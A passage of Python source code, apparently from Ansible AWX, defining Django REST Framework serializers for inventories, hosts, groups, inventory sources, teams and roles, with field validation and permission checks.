obj):\n res = super(ProjectUpdateSerializer, self).get_related(obj)\n try:\n res.update(dict(\n project = self.reverse('api:project_detail', kwargs={'pk': obj.project.pk}),\n ))\n except ObjectDoesNotExist:\n pass\n res.update(dict(\n cancel = self.reverse('api:project_update_cancel', kwargs={'pk': obj.pk}),\n scm_inventory_updates = self.reverse('api:project_update_scm_inventory_updates', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:project_update_notifications_list', kwargs={'pk': obj.pk}),\n events = self.reverse('api:project_update_events_list', kwargs={'pk': obj.pk}),\n ))\n return res\n\n\nclass ProjectUpdateDetailSerializer(ProjectUpdateSerializer):\n\n host_status_counts = serializers.SerializerMethodField(\n help_text=_('A count of hosts uniquely assigned to each status.'),\n )\n playbook_counts = serializers.SerializerMethodField(\n help_text=_('A count of all plays and tasks for the job run.'),\n )\n\n class Meta:\n model = ProjectUpdate\n fields = ('*', 'host_status_counts', 'playbook_counts',)\n\n def get_playbook_counts(self, obj):\n task_count = obj.project_update_events.filter(event='playbook_on_task_start').count()\n play_count = obj.project_update_events.filter(event='playbook_on_play_start').count()\n\n data = {'play_count': play_count, 'task_count': task_count}\n\n return data\n\n def get_host_status_counts(self, obj):\n try:\n counts = obj.project_update_events.only('event_data').get(event='playbook_on_stats').get_host_status_counts()\n except ProjectUpdateEvent.DoesNotExist:\n counts = {}\n\n return counts\n\n\nclass ProjectUpdateListSerializer(ProjectUpdateSerializer, UnifiedJobListSerializer):\n\n class Meta:\n model = ProjectUpdate\n fields = ('*', '-controller_node') # field removal undone by UJ serializer\n\n\nclass ProjectUpdateCancelSerializer(ProjectUpdateSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass BaseSerializerWithVariables(BaseSerializer):\n\n def validate_variables(self, value):\n return vars_validate_or_raise(value)\n\n\nclass InventorySerializer(BaseSerializerWithVariables):\n show_capabilities = ['edit', 'delete', 'adhoc', 'copy']\n capabilities_prefetch = [\n 'admin', 'adhoc',\n {'copy': 'organization.inventory_admin'}\n ]\n groups_with_active_failures = serializers.IntegerField(\n read_only=True,\n min_value=0,\n help_text=_('This field has been deprecated and will be removed in a future release')\n )\n\n\n class Meta:\n model = Inventory\n fields = ('*', 'organization', 'kind', 'host_filter', 'variables', 'has_active_failures',\n 'total_hosts', 'hosts_with_active_failures', 'total_groups',\n 'groups_with_active_failures', 'has_inventory_sources',\n 'total_inventory_sources', 'inventory_sources_with_failures',\n 'insights_credential', 'pending_deletion',)\n\n def get_related(self, obj):\n res = super(InventorySerializer, self).get_related(obj)\n res.update(dict(\n hosts = self.reverse('api:inventory_hosts_list', kwargs={'pk': obj.pk}),\n groups = self.reverse('api:inventory_groups_list', kwargs={'pk': obj.pk}),\n root_groups = self.reverse('api:inventory_root_groups_list', kwargs={'pk': obj.pk}),\n variable_data = self.reverse('api:inventory_variable_data', kwargs={'pk': obj.pk}),\n script = self.reverse('api:inventory_script_view', kwargs={'pk': obj.pk}),\n tree = self.reverse('api:inventory_tree_view', kwargs={'pk': obj.pk}),\n inventory_sources = self.reverse('api:inventory_inventory_sources_list', kwargs={'pk': obj.pk}),\n update_inventory_sources = self.reverse('api:inventory_inventory_sources_update', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:inventory_activity_stream_list', kwargs={'pk': obj.pk}),\n job_templates = self.reverse('api:inventory_job_template_list', kwargs={'pk': obj.pk}),\n ad_hoc_commands = self.reverse('api:inventory_ad_hoc_commands_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:inventory_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:inventory_object_roles_list', kwargs={'pk': obj.pk}),\n instance_groups = self.reverse('api:inventory_instance_groups_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:inventory_copy', kwargs={'pk': obj.pk})\n ))\n if obj.insights_credential:\n res['insights_credential'] = self.reverse('api:credential_detail', kwargs={'pk': obj.insights_credential.pk})\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(InventorySerializer, self).to_representation(obj)\n if obj is not None and 'organization' in ret and not obj.organization:\n ret['organization'] = None\n return ret\n\n def validate_host_filter(self, host_filter):\n if host_filter:\n try:\n for match in JSONBField.get_lookups().keys():\n if match == 'exact':\n # __exact is allowed\n continue\n match = '__{}'.format(match)\n if re.match(\n 'ansible_facts[^=]+{}='.format(match),\n host_filter\n ):\n raise models.base.ValidationError({\n 'host_filter': 'ansible_facts does not support searching with {}'.format(match)\n })\n SmartFilter().query_from_string(host_filter)\n except RuntimeError as e:\n raise models.base.ValidationError(e)\n return host_filter\n\n def validate(self, attrs):\n kind = None\n if 'kind' in attrs:\n kind = attrs['kind']\n elif self.instance:\n kind = self.instance.kind\n\n host_filter = None\n if 'host_filter' in attrs:\n host_filter = attrs['host_filter']\n elif self.instance:\n host_filter = self.instance.host_filter\n\n if kind == 'smart' and not host_filter:\n raise serializers.ValidationError({'host_filter': _(\n 'Smart inventories must specify host_filter')})\n return super(InventorySerializer, self).validate(attrs)\n\n\nclass InventoryScriptSerializer(InventorySerializer):\n\n class Meta:\n fields = ()\n\n\nclass HostSerializer(BaseSerializerWithVariables):\n show_capabilities = ['edit', 'delete']\n capabilities_prefetch = ['inventory.admin']\n\n class Meta:\n model = Host\n fields = ('*', 'inventory', 'enabled', 'instance_id', 'variables',\n 'has_active_failures', 'has_inventory_sources', 'last_job',\n 'last_job_host_summary', 'insights_system_id', 'ansible_facts_modified',)\n read_only_fields = ('last_job', 'last_job_host_summary', 'insights_system_id',\n 'ansible_facts_modified',)\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(HostSerializer, self).build_relational_field(field_name, relation_info)\n # Inventory is read-only unless creating a new host.\n if self.instance and field_name == 'inventory':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n def get_related(self, obj):\n res = super(HostSerializer, self).get_related(obj)\n res.update(dict(\n variable_data = self.reverse('api:host_variable_data', kwargs={'pk': obj.pk}),\n groups = self.reverse('api:host_groups_list', kwargs={'pk': obj.pk}),\n all_groups = self.reverse('api:host_all_groups_list', kwargs={'pk': obj.pk}),\n job_events = self.reverse('api:host_job_events_list', kwargs={'pk': obj.pk}),\n job_host_summaries = self.reverse('api:host_job_host_summaries_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:host_activity_stream_list', kwargs={'pk': obj.pk}),\n inventory_sources = self.reverse('api:host_inventory_sources_list', kwargs={'pk': obj.pk}),\n smart_inventories = self.reverse('api:host_smart_inventories_list', kwargs={'pk': obj.pk}),\n ad_hoc_commands = self.reverse('api:host_ad_hoc_commands_list', kwargs={'pk': obj.pk}),\n ad_hoc_command_events = self.reverse('api:host_ad_hoc_command_events_list', kwargs={'pk': obj.pk}),\n insights = self.reverse('api:host_insights', kwargs={'pk': obj.pk}),\n ansible_facts = self.reverse('api:host_ansible_facts_detail', kwargs={'pk': obj.pk}),\n ))\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n if obj.last_job:\n res['last_job'] = self.reverse('api:job_detail', kwargs={'pk': obj.last_job.pk})\n if obj.last_job_host_summary:\n res['last_job_host_summary'] = self.reverse('api:job_host_summary_detail', kwargs={'pk': obj.last_job_host_summary.pk})\n return res\n\n def get_summary_fields(self, obj):\n d = super(HostSerializer, self).get_summary_fields(obj)\n try:\n d['last_job']['job_template_id'] = obj.last_job.job_template.id\n d['last_job']['job_template_name'] = obj.last_job.job_template.name\n except (KeyError, AttributeError):\n pass\n if has_model_field_prefetched(obj, 'groups'):\n group_list = sorted([{'id': g.id, 'name': g.name} for g in obj.groups.all()], key=lambda x: x['id'])[:5]\n else:\n group_list = [{'id': g.id, 'name': g.name} for g in obj.groups.all().order_by('id')[:5]]\n group_cnt = obj.groups.count()\n d.setdefault('groups', {'count': group_cnt, 'results': group_list})\n d.setdefault('recent_jobs', [{\n 'id': j.job.id,\n 'name': j.job.job_template.name if j.job.job_template is not None else \"\",\n 'status': j.job.status,\n 'finished': j.job.finished,\n } for j in obj.job_host_summaries.select_related('job__job_template').order_by('-created')[:5]])\n return d\n\n def _get_host_port_from_name(self, name):\n # Allow hostname (except IPv6 for now) to specify the port # inline.\n port = None\n if name.count(':') == 1:\n name, port = name.split(':')\n try:\n port = int(port)\n if port < 1 or port > 65535:\n raise ValueError\n except ValueError:\n raise serializers.ValidationError(_(u'Invalid port specification: %s') % force_text(port))\n return name, port\n\n def validate_name(self, value):\n name = force_text(value or '')\n # Validate here only, update in main validate method.\n host, port = self._get_host_port_from_name(name)\n return value\n\n def validate_inventory(self, value):\n if value.kind == 'smart':\n raise serializers.ValidationError({\"detail\": _(\"Cannot create Host for Smart Inventory\")})\n return value\n\n def validate_variables(self, value):\n return vars_validate_or_raise(value)\n\n def validate(self, attrs):\n name = force_text(attrs.get('name', self.instance and self.instance.name or ''))\n host, port = self._get_host_port_from_name(name)\n\n if port:\n attrs['name'] = host\n variables = force_text(attrs.get('variables', self.instance and self.instance.variables or ''))\n vars_dict = parse_yaml_or_json(variables)\n vars_dict['ansible_ssh_port'] = port\n attrs['variables'] = json.dumps(vars_dict)\n\n return super(HostSerializer, self).validate(attrs)\n\n def to_representation(self, obj):\n ret = super(HostSerializer, self).to_representation(obj)\n if not obj:\n return ret\n if 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n if 'last_job' in ret and not obj.last_job:\n ret['last_job'] = None\n if 'last_job_host_summary' in ret and not obj.last_job_host_summary:\n ret['last_job_host_summary'] = None\n return ret\n\n\nclass AnsibleFactsSerializer(BaseSerializer):\n class Meta:\n model = Host\n\n def to_representation(self, obj):\n return obj.ansible_facts\n\n\nclass GroupSerializer(BaseSerializerWithVariables):\n show_capabilities = ['copy', 'edit', 'delete']\n capabilities_prefetch = ['inventory.admin', 'inventory.adhoc']\n groups_with_active_failures = serializers.IntegerField(\n read_only=True,\n min_value=0,\n help_text=_('This field has been deprecated and will be removed in a future release')\n )\n\n class Meta:\n model = Group\n fields = ('*', 'inventory', 'variables', 'has_active_failures',\n 'total_hosts', 'hosts_with_active_failures', 'total_groups',\n 'groups_with_active_failures', 'has_inventory_sources')\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(GroupSerializer, self).build_relational_field(field_name, relation_info)\n # Inventory is read-only unless creating a new group.\n if self.instance and field_name == 'inventory':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n def get_related(self, obj):\n res = super(GroupSerializer, self).get_related(obj)\n res.update(dict(\n variable_data = self.reverse('api:group_variable_data', kwargs={'pk': obj.pk}),\n hosts = self.reverse('api:group_hosts_list', kwargs={'pk': obj.pk}),\n potential_children = self.reverse('api:group_potential_children_list', kwargs={'pk': obj.pk}),\n children = self.reverse('api:group_children_list', kwargs={'pk': obj.pk}),\n all_hosts = self.reverse('api:group_all_hosts_list', kwargs={'pk': obj.pk}),\n job_events = self.reverse('api:group_job_events_list', kwargs={'pk': obj.pk}),\n job_host_summaries = self.reverse('api:group_job_host_summaries_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:group_activity_stream_list', kwargs={'pk': obj.pk}),\n inventory_sources = self.reverse('api:group_inventory_sources_list', kwargs={'pk': obj.pk}),\n ad_hoc_commands = self.reverse('api:group_ad_hoc_commands_list', kwargs={'pk': obj.pk}),\n ))\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n return res\n\n def validate_name(self, value):\n if value in ('all', '_meta'):\n raise serializers.ValidationError(_('Invalid group name.'))\n return value\n\n def validate_inventory(self, value):\n if value.kind == 'smart':\n raise serializers.ValidationError({\"detail\": _(\"Cannot create Group for Smart Inventory\")})\n return value\n\n def to_representation(self, obj):\n ret = super(GroupSerializer, self).to_representation(obj)\n if obj is not None and 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n return ret\n\n\nclass GroupTreeSerializer(GroupSerializer):\n\n children = serializers.SerializerMethodField()\n\n class Meta:\n model = Group\n fields = ('*', 'children')\n\n def get_children(self, obj):\n if obj is None:\n return {}\n children_qs = obj.children\n children_qs = children_qs.select_related('inventory')\n children_qs = children_qs.prefetch_related('inventory_source')\n return GroupTreeSerializer(children_qs, many=True).data\n\n\nclass BaseVariableDataSerializer(BaseSerializer):\n\n class Meta:\n fields = ('variables',)\n\n def to_representation(self, obj):\n if obj is None:\n return {}\n ret = super(BaseVariableDataSerializer, self).to_representation(obj)\n return parse_yaml_or_json(ret.get('variables', '') or '{}')\n\n def to_internal_value(self, data):\n data = {'variables': json.dumps(data)}\n return super(BaseVariableDataSerializer, self).to_internal_value(data)\n\n\nclass InventoryVariableDataSerializer(BaseVariableDataSerializer):\n\n class Meta:\n model = Inventory\n\n\nclass HostVariableDataSerializer(BaseVariableDataSerializer):\n\n class Meta:\n model = Host\n\n\nclass GroupVariableDataSerializer(BaseVariableDataSerializer):\n\n class Meta:\n model = Group\n\n\nclass CustomInventoryScriptSerializer(BaseSerializer):\n\n script = serializers.CharField(trim_whitespace=False)\n show_capabilities = ['edit', 'delete', 'copy']\n capabilities_prefetch = [\n {'edit': 'admin'}\n ]\n\n class Meta:\n model = CustomInventoryScript\n fields = ('*', \"script\", \"organization\")\n\n def validate_script(self, value):\n if not value.startswith(\"#!\"):\n raise serializers.ValidationError(_('Script must begin with a hashbang sequence: i.e.... #!/usr/bin/env python'))\n return value\n\n def to_representation(self, obj):\n ret = super(CustomInventoryScriptSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n request = self.context.get('request', None)\n if request.user not in obj.admin_role and \\\n not request.user.is_superuser and \\\n not request.user.is_system_auditor and \\\n not (obj.organization is not None and request.user in obj.organization.auditor_role):\n ret['script'] = None\n return ret\n\n def get_related(self, obj):\n res = super(CustomInventoryScriptSerializer, self).get_related(obj)\n res.update(dict(\n object_roles = self.reverse('api:inventory_script_object_roles_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:inventory_script_copy', kwargs={'pk': obj.pk}),\n ))\n\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n\nclass InventorySourceOptionsSerializer(BaseSerializer):\n credential = DeprecatedCredentialField(\n help_text=_('Cloud credential to use for inventory updates.')\n )\n\n class Meta:\n fields = ('*', 'source', 'source_path', 'source_script', 'source_vars', 'credential',\n 'source_regions', 'instance_filters', 'group_by', 'overwrite', 'overwrite_vars',\n 'custom_virtualenv', 'timeout', 'verbosity')\n\n def get_related(self, obj):\n res = super(InventorySourceOptionsSerializer, self).get_related(obj)\n if obj.credential: # TODO: remove when 'credential' field is removed\n res['credential'] = self.reverse('api:credential_detail',\n kwargs={'pk': obj.credential})\n if obj.source_script:\n res['source_script'] = self.reverse('api:inventory_script_detail', kwargs={'pk': obj.source_script.pk})\n return res\n\n def validate_source_vars(self, value):\n ret = vars_validate_or_raise(value)\n for env_k in parse_yaml_or_json(value):\n if env_k in settings.INV_ENV_VARIABLE_BLACKLIST:\n raise serializers.ValidationError(_(\"`{}` is a prohibited environment variable\".format(env_k)))\n return ret\n\n def validate(self, attrs):\n # TODO: Validate source, validate source_regions\n errors = {}\n\n source = attrs.get('source', self.instance and self.instance.source or '')\n source_script = attrs.get('source_script', self.instance and self.instance.source_script or '')\n if source == 'custom':\n if source_script is None or source_script == '':\n errors['source_script'] = _(\"If 'source' is 'custom', 'source_script' must be provided.\")\n else:\n try:\n if not self.instance:\n dest_inventory = attrs.get('inventory', None)\n if not dest_inventory:\n errors['inventory'] = _(\"Must provide an inventory.\")\n else:\n dest_inventory = self.instance.inventory\n if dest_inventory and source_script.organization != dest_inventory.organization:\n errors['source_script'] = _(\"The 'source_script' does not belong to the same organization as the inventory.\")\n except Exception:\n errors['source_script'] = _(\"'source_script' doesn't exist.\")\n logger.exception('Problem processing source_script validation.')\n\n if errors:\n raise serializers.ValidationError(errors)\n\n return super(InventorySourceOptionsSerializer, self).validate(attrs)\n\n\nclass InventorySourceSerializer(UnifiedJobTemplateSerializer, InventorySourceOptionsSerializer):\n\n status = serializers.ChoiceField(choices=InventorySource.INVENTORY_SOURCE_STATUS_CHOICES, read_only=True)\n last_update_failed = serializers.BooleanField(read_only=True)\n last_updated = serializers.DateTimeField(read_only=True)\n show_capabilities = ['start', 'schedule', 'edit', 'delete']\n capabilities_prefetch = [\n {'admin': 'inventory.admin'},\n {'start': 'inventory.update'}\n ]\n\n class Meta:\n model = InventorySource\n fields = ('*', 'name', 'inventory', 'update_on_launch', 'update_cache_timeout',\n 'source_project', 'update_on_project_update') + \\\n ('last_update_failed', 'last_updated') # Backwards compatibility.\n\n def get_related(self, obj):\n res = super(InventorySourceSerializer, self).get_related(obj)\n res.update(dict(\n update = self.reverse('api:inventory_source_update_view', kwargs={'pk': obj.pk}),\n inventory_updates = self.reverse('api:inventory_source_updates_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:inventory_source_schedules_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:inventory_source_activity_stream_list', kwargs={'pk': obj.pk}),\n hosts = self.reverse('api:inventory_source_hosts_list', kwargs={'pk': obj.pk}),\n groups = self.reverse('api:inventory_source_groups_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:inventory_source_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:inventory_source_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:inventory_source_notification_templates_error_list', kwargs={'pk': obj.pk}),\n ))\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n if obj.source_project_id is not None:\n res['source_project'] = self.reverse('api:project_detail', kwargs={'pk': obj.source_project.pk})\n # Backwards compatibility.\n if obj.current_update:\n res['current_update'] = self.reverse('api:inventory_update_detail',\n kwargs={'pk': obj.current_update.pk})\n if obj.last_update:\n res['last_update'] = self.reverse('api:inventory_update_detail',\n kwargs={'pk': obj.last_update.pk})\n else:\n res['credentials'] = self.reverse('api:inventory_source_credentials_list', kwargs={'pk': obj.pk})\n return res\n\n def get_group(self, obj): # TODO: remove in 3.3\n if obj.deprecated_group:\n return obj.deprecated_group.id\n return None\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(InventorySourceSerializer, self).build_relational_field(field_name, relation_info)\n # SCM Project and inventory are read-only unless creating a new inventory.\n if self.instance and field_name == 'inventory':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n # TODO: remove when old 'credential' fields are removed\n def build_field(self, field_name, info, model_class, nested_depth):\n # have to special-case the field so that DRF will not automagically make it\n # read-only because it's a property on the model.\n if field_name == 'credential':\n return self.build_standard_field(field_name, self.credential)\n return super(InventorySourceOptionsSerializer, self).build_field(field_name, info, model_class, nested_depth)\n\n def to_representation(self, obj):\n ret = super(InventorySourceSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n return ret\n\n def validate_source_project(self, value):\n if value and value.scm_type == '':\n raise serializers.ValidationError(_(\"Cannot use manual project for SCM-based inventory.\"))\n return value\n\n def validate_update_on_project_update(self, value):\n if value and self.instance and self.instance.schedules.exists():\n raise serializers.ValidationError(_(\"Setting not compatible with existing schedules.\"))\n return value\n\n def validate_inventory(self, value):\n if value and value.kind == 'smart':\n raise serializers.ValidationError({\"detail\": _(\"Cannot create Inventory Source for Smart Inventory\")})\n return value\n\n # TODO: remove when old 'credential' fields are removed\n def create(self, validated_data):\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(InventorySourceSerializer, self).create(validated_data)\n if deprecated_fields:\n self._update_deprecated_fields(deprecated_fields, obj)\n return obj\n\n # TODO: remove when old 'credential' fields are removed\n def update(self, obj, validated_data):\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(InventorySourceSerializer, self).update(obj, validated_data)\n if deprecated_fields:\n self._update_deprecated_fields(deprecated_fields, obj)\n return obj\n\n # TODO: remove when old 'credential' fields are removed\n def _update_deprecated_fields(self, fields, obj):\n if 'credential' in fields:\n new_cred = fields['credential']\n existing = obj.credentials.all()\n if new_cred not in existing:\n for cred in existing:\n # Remove all other cloud credentials\n obj.credentials.remove(cred)\n if new_cred:\n # Add new credential\n obj.credentials.add(new_cred)\n\n def validate(self, attrs):\n deprecated_fields = {}\n if 'credential' in attrs: # TODO: remove when 'credential' field removed\n deprecated_fields['credential'] = attrs.pop('credential')\n\n def get_field_from_model_or_attrs(fd):\n return attrs.get(fd, self.instance and getattr(self.instance, fd) or None)\n\n if get_field_from_model_or_attrs('source') != 'scm':\n redundant_scm_fields = list(filter(\n lambda x: attrs.get(x, None),\n ['source_project', 'source_path', 'update_on_project_update']\n ))\n if redundant_scm_fields:\n raise serializers.ValidationError(\n {\"detail\": _(\"Cannot set %s if not SCM type.\" % ' '.join(redundant_scm_fields))}\n )\n\n attrs = super(InventorySourceSerializer, self).validate(attrs)\n\n # Check type consistency of source and cloud credential, if provided\n if 'credential' in deprecated_fields: # TODO: remove when v2 API is deprecated\n cred = deprecated_fields['credential']\n attrs['credential'] = cred\n if cred is not None:\n cred = Credential.objects.get(pk=cred)\n view = self.context.get('view', None)\n if (not view) or (not view.request) or (view.request.user not in cred.use_role):\n raise PermissionDenied()\n cred_error = InventorySource.cloud_credential_validation(\n get_field_from_model_or_attrs('source'),\n cred\n )\n if cred_error:\n raise serializers.ValidationError({\"credential\": cred_error})\n\n return attrs\n\n\nclass InventorySourceUpdateSerializer(InventorySourceSerializer):\n\n can_update = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_update',)\n\n\nclass InventoryUpdateSerializer(UnifiedJobSerializer, InventorySourceOptionsSerializer):\n\n custom_virtualenv = serializers.ReadOnlyField()\n\n class Meta:\n model = InventoryUpdate\n fields = ('*', 'inventory', 'inventory_source', 'license_error', 'org_host_limit_error',\n 'source_project_update', 'custom_virtualenv', '-controller_node',)\n\n def get_related(self, obj):\n res = super(InventoryUpdateSerializer, self).get_related(obj)\n try:\n res.update(dict(\n inventory_source = self.reverse(\n 'api:inventory_source_detail', kwargs={'pk': obj.inventory_source.pk}\n ),\n ))\n except ObjectDoesNotExist:\n pass\n res.update(dict(\n cancel = self.reverse('api:inventory_update_cancel', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:inventory_update_notifications_list', kwargs={'pk': obj.pk}),\n events = self.reverse('api:inventory_update_events_list', kwargs={'pk': obj.pk}),\n ))\n if obj.source_project_update_id:\n res['source_project_update'] = self.reverse('api:project_update_detail',\n kwargs={'pk': obj.source_project_update.pk})\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n\n res['credentials'] = self.reverse('api:inventory_update_credentials_list', kwargs={'pk': obj.pk})\n\n return res\n\n\nclass InventoryUpdateDetailSerializer(InventoryUpdateSerializer):\n\n source_project = serializers.SerializerMethodField(\n help_text=_('The project used for this job.'),\n method_name='get_source_project_id'\n )\n\n class Meta:\n model = InventoryUpdate\n fields = ('*', 'source_project',)\n\n def get_source_project(self, obj):\n return getattrd(obj, 'source_project_update.unified_job_template', None)\n\n def get_source_project_id(self, obj):\n return getattrd(obj, 'source_project_update.unified_job_template.id', None)\n\n def get_related(self, obj):\n res = super(InventoryUpdateDetailSerializer, self).get_related(obj)\n source_project_id = self.get_source_project_id(obj)\n\n if source_project_id:\n res['source_project'] = self.reverse('api:project_detail', kwargs={'pk': source_project_id})\n return res\n\n def get_summary_fields(self, obj):\n summary_fields = super(InventoryUpdateDetailSerializer, self).get_summary_fields(obj)\n\n source_project = self.get_source_project(obj)\n if source_project:\n summary_fields['source_project'] = {}\n for field in SUMMARIZABLE_FK_FIELDS['project']:\n value = getattr(source_project, field, None)\n if value is not None:\n summary_fields['source_project'][field] = value\n\n cred = obj.credentials.first()\n if cred:\n summary_fields['credential'] = {\n 'id': cred.pk,\n 'name': cred.name,\n 'description': cred.description,\n 'kind': cred.kind,\n 'cloud': cred.credential_type.kind == 'cloud'\n }\n\n return summary_fields\n\n\nclass InventoryUpdateListSerializer(InventoryUpdateSerializer, UnifiedJobListSerializer):\n\n class Meta:\n model = InventoryUpdate\n fields = ('*', '-controller_node') # field removal undone by UJ serializer\n\n\nclass InventoryUpdateCancelSerializer(InventoryUpdateSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass TeamSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete']\n\n class Meta:\n model = Team\n fields = ('*', 'organization')\n\n def get_related(self, obj):\n res = super(TeamSerializer, self).get_related(obj)\n res.update(dict(\n projects = self.reverse('api:team_projects_list', kwargs={'pk': obj.pk}),\n users = self.reverse('api:team_users_list', kwargs={'pk': obj.pk}),\n credentials = self.reverse('api:team_credentials_list', kwargs={'pk': obj.pk}),\n roles = self.reverse('api:team_roles_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:team_object_roles_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:team_activity_stream_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:team_access_list', kwargs={'pk': obj.pk}),\n ))\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(TeamSerializer, self).to_representation(obj)\n if obj is not None and 'organization' in ret and not obj.organization:\n ret['organization'] = None\n return ret\n\n\nclass RoleSerializer(BaseSerializer):\n\n class Meta:\n model = Role\n fields = ('*', '-created', '-modified')\n read_only_fields = ('id', 'role_field', 'description', 'name')\n\n def to_representation(self, obj):\n ret = super(RoleSerializer, self).to_representation(obj)\n\n if obj.object_id:\n content_object = obj.content_object\n if hasattr(content_object, 'username'):\n ret['summary_fields']['resource_name'] = obj.content_object.username\n if hasattr(content_object, 'name'):\n ret['summary_fields']['resource_name'] = obj.content_object.name\n content_model = obj.content_type.model_class()\n ret['summary_fields']['resource_type'] = get_type_for_model(content_model)\n ret['summary_fields']['resource_type_display_name'] = content_model._meta.verbose_name.title()\n\n return ret\n\n def get_related(self, obj):\n ret = super(RoleSerializer, self).get_related(obj)\n ret['users'] = self.reverse('api:role_users_list', kwargs={'pk': obj.pk})\n ret['teams'] = self.reverse('api:role_teams_list', kwargs={'pk': obj.pk})\n try:\n if obj.content_object:\n ret.update(reverse_gfk(obj.content_object, self.context.get('request')))\n except AttributeError:\n # AttributeError's happen if our content_object is pointing at\n # a model that no longer exists. This is dirty data and ideally\n # doesn't exist, but in case it does, let's not puke.\n pass\n return ret\n\n\nclass RoleSerializerWithParentAccess(RoleSerializer):\n show_capabilities = ['unattach']\n\n\nclass ResourceAccessListElementSerializer(UserSerializer):\n show_capabilities = [] # Clear fields from UserSerializer parent class\n\n def to_representation(self, user):\n '''\n With this method we derive \"direct\" and \"indirect\" access lists. Contained\n in the direct access list are all the roles the user is a member of, and\n all of the roles that are directly granted to any teams that the user is a\n member of.\n\n The indirect access list is a list of all of the roles that the user is\n a member of that are ancestors of any roles that grant permissions to\n the resource.\n '''\n ret = super(ResourceAccessListElementSerializer, self).to_representation(user)\n obj = self.context['view'].get_parent_object()\n if self.context['view'].request is not None:\n requesting_user = self.context['view'].request.user\n else:\n requesting_user = None\n\n if 'summary_fields' not in ret:\n ret['summary_fields'] = {}\n\n def format_role_perm(role):\n role_dict = { 'id': role.id, 'name': role.name, 'description': role.description}\n try:\n role_dict['resource_name'] = role.content_object.name\n role_dict['resource_type'] = get_type_for_model(role.content_type.model_class())\n role_dict['related'] = reverse_gfk(role.content_object, self.context.get('request'))\n except AttributeError:\n pass\n if role.content_type is not None:\n role_dict['user_capabilities'] = {'unattach': requesting_user.can_access(\n Role, 'unattach', role, user, 'members', data={}, skip_sub_obj_read_check=False)}\n else:\n # Singleton roles should not be managed from this view, as per copy/edit rework spec\n role_dict['user_capabilities'] = {'unattach': False}\n return { 'role': role_dict, 'descendant_roles': get_roles_on_resource(obj, role)}\n\n def format_team_role_perm(naive_team_role, permissive_role_ids):\n ret = []\n team_role = naive_team_role\n if naive_team_role.role_field == 'admin_role':\n team_role = naive_team_role.content_object.member_role\n for role in team_role.children.filter(id__in=permissive_role_ids).all():\n role_dict = {\n 'id': role.id,\n 'name': role.name,\n 'description': role.description,\n 'team_id': team_role.object_id,\n 'team_name': team_role.content_object.name,\n 'team_organization_name': team_role.content_object.organization.name,\n }\n if role.content_type is not None:\n role_dict['resource_name'] = role.content_object.name\n role_dict['resource_type'] = get_type_for_model(role.content_type.model_class())\n role_dict['related'] = reverse_gfk(role.content_object, self.context.get('request'))\n role_dict['user_capabilities'] = {'unattach': requesting_user.can_access(\n Role, 'unattach', role, team_role, 'parents', data={}, skip_sub_obj_read_check=False)}\n else:\n # Singleton roles should not be managed from this view, as per copy/edit rework spec\n role_dict['user_capabilities'] = {'unattach': False}\n ret.append({ 'role': role_dict, 'descendant_roles': get_roles_on_resource(obj, team_role)})\n return ret\n\n team_content_type = ContentType.objects.get_for_model(Team)\n content_type = ContentType.objects.get_for_model(obj)\n\n direct_permissive_role_ids = Role.objects.filter(content_type=content_type, object_id=obj.id).values_list('id', flat=True)\n all_permissive_role_ids = Role.objects.filter(content_type=content_type, object_id=obj.id).values_list('ancestors__id', flat=True)\n\n direct_access_roles = user.roles \\\n 